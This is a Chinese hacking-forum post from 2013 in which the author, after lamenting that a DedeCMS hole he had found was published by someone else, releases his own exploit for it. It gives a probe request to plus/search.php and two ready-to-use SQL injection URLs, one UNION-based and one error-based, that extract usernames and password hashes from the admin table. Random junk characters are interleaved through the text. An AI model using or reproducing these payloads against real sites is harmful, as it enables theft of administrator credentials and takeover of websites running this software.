转载不加作者名的没JJ
5 J& I; B! a9 G- \: t. a3 i* |1 L) \. c# r8 D
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
8 j8 r N- d. L5 Z4 F9 i3 m3 |9 A& o
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。- Z O# y+ l) d2 w
3 q* u- k& v a8 x& D$ F; g; m我一般是这样测试的:
9 D* @+ m( t3 m% E3 _3 c- _
0 ]3 B4 i ~ Z' ]7 A提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a' t5 h# }8 V& j3 A& ?; f q. ~
- k$ X. L$ `' D& b l# X转载不加作者名的没JJ; t. W8 f1 w% r) r& b- M
( v" [* A" r j/ i
作者:鬼哥6 E$ P" M2 o' ?+ J6 R
+ g6 L1 ~3 D& d/ s
1 f# k) F! K: D) u6 E9 l0 X* }; U4 c4 B+ f! ]
看结果如果提示
4 q( T. ]+ x; n5 s$ E
# r7 j, s# ?& S( ]/ P/ kSafe Alert: Request Error step 2 !
[4 J8 c* Z- l- T% ~/ ~: J4 ]5 X r7 z2 Z
那么直接用下面的exp8 h6 _0 S- Z8 Q, o+ H( `9 J
" J' @4 T2 g) C" Z! Uxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
" t: `* z9 p6 N' ~5 m
5 b+ P* s. a& F& U" \, F! [! P1 Q9 c, w: v/ u1 K+ u) r
看结果如果提示% d7 r( s& m2 P, C K
, Q, ]5 n& m/ R6 v& n' k+ r' `7 LSafe Alert: Request Error step 1 !2 S7 }$ q& G, d2 H6 X
" Z- h) r6 M+ ?$ w* u( A2 x
那么直接用下面的exp
. C1 J$ O. @8 c' p" q
- g" b- N4 r, Y$ G, z8 K8 Bxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
; [$ P1 E1 @! u! w3 i
v7 w# m9 X& D1 F( d0 k# H" G
|( |6 K2 T) M- g, _* H9 ~ Y如果正常显示证明漏洞不存在了。! J4 F1 r- B5 f5 t
- b2 f+ M5 M; Q$ y. N* p. E+ }转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对